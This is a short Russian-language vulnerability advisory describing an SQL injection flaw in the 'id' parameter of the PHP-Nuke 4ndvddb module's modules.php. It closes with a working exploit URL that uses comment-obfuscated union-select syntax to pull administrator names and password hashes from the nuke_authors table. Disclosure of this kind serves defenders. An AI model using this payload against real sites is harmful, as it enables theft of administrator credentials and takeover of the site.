Программа: PHP-Nuke 4ndvddb Module 0.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "id" сценарием modules.php (когда "name"
установлен в значение "4ndvddb" и "rop" установлен в значение "show_dvd").
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
modules.php?name=4ndvddb&rop=show_dvd&id=
sql=1%2F%2A%2A%2Funion%2F%2A%2A%2F select%2F%2A%2A%2F0%2C0,
aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2F
nuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2F radminsuper%3D1%2F%2A